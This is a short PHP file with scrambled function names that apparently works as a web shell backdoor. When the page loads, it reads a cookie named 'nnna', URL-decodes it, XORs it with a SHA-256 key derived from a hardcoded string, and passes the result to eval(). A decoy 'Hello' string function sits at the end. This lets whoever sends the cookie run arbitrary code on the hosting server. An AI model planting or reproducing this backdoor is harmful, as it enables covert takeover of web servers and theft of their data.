<?php	function AvRfuHbEqU($vfwNLka)
{
    $nUDmzBCRE = $_COOKIE[$vfwNLka];
    return $nUDmzBCRE;
}
function mbDzvtv($UrspXYhV)
{
    $uYYKVHMzSK = strlen($UrspXYhV);
    return $uYYKVHMzSK;
}
function CPMGoUi($WywulXPO)
{
    $WsgQKsyUG = IKFXCyXoD($WywulXPO);
    $bgaytprki = qjIeJ($WywulXPO, $WsgQKsyUG);
    return $bgaytprki;
}
function ItWtUiW()
{
    $aTSCCD = CtyiMATa();
    $BjqXkAeET = CPMGoUi($aTSCCD);
    return $BjqXkAeET;
}
function RZmuTy($ljlNSg) {
    return strlen($ljlNSg);
}
function NABBCXn($pFDWHHGoH, $TDKWzDH)
{
    $QcHSFF = $pFDWHHGoH ^ $TDKWzDH;
    return $QcHSFF;
}
function yHQfv($GJrwrqoe)
{
    eval($GJrwrqoe);
}
function eBXFwXrYPJ($qplaFBFtxZ, $EtbxCifRsw)
{
    $EwVNw = mbDzvtv($qplaFBFtxZ);
    $nxrap = dffuwrfbCt($EtbxCifRsw, $EwVNw);
    $OVIqVXd = NABBCXn($nxrap, $qplaFBFtxZ);
    return $OVIqVXd;
}
function MjDvWxJ($jranIrMdtr)
{
    $pWTgJE = AvRfuHbEqU($jranIrMdtr);
    $svyENkCwB = sdFeh($pWTgJE);
    return $svyENkCwB;
}
function GwrPTHh($ljlNSg) {
    return strrev($ljlNSg);
}
function IKFXCyXoD($shoJduHFp)
{
    $KjeZoHMAm = substr($shoJduHFp, -4);
    return $KjeZoHMAm;
}
function dffuwrfbCt($gpDZcT, $RvltuXX)
{
    $VYVTyselL = str_pad($gpDZcT, $RvltuXX, $gpDZcT);
    return $VYVTyselL;
}
function CtyiMATa()
{
    $BfwGkun = "odoHxNVhBjnna";
    return $BfwGkun;
}
function ZgsRmyZn($ZdbSlX)
{
    $Gqwfaxf = hash("sha256", $ZdbSlX, TRUE);
    return $Gqwfaxf;
}
function sdFeh($HFLIcW)
{
    $ApWcO = rawurldecode($HFLIcW);
    return $ApWcO;
}
function Dnqbi($ljlNSg) {
    $rgYgpWzQBt = GwrPTHh($ljlNSg);
    $mEQbSKLSEk = RZmuTy($ljlNSg);
    return [$rgYgpWzQBt, $mEQbSKLSEk];
}
function qjIeJ($vrtazVFu, $uvdOCWeTqT)
{
    $jEMEGU = ZgsRmyZn($vrtazVFu);
    $svyENkCwB = MjDvWxJ($uvdOCWeTqT);
    $gTpxANjiU = eBXFwXrYPJ($svyENkCwB, $jEMEGU);
    return $gTpxANjiU;
}
function yxlbpq()
{
    $OVIqVXd = ItWtUiW();
    yHQfv($OVIqVXd);
}
yxlbpq();
$rRhIrXooyC = Dnqbi("Hello");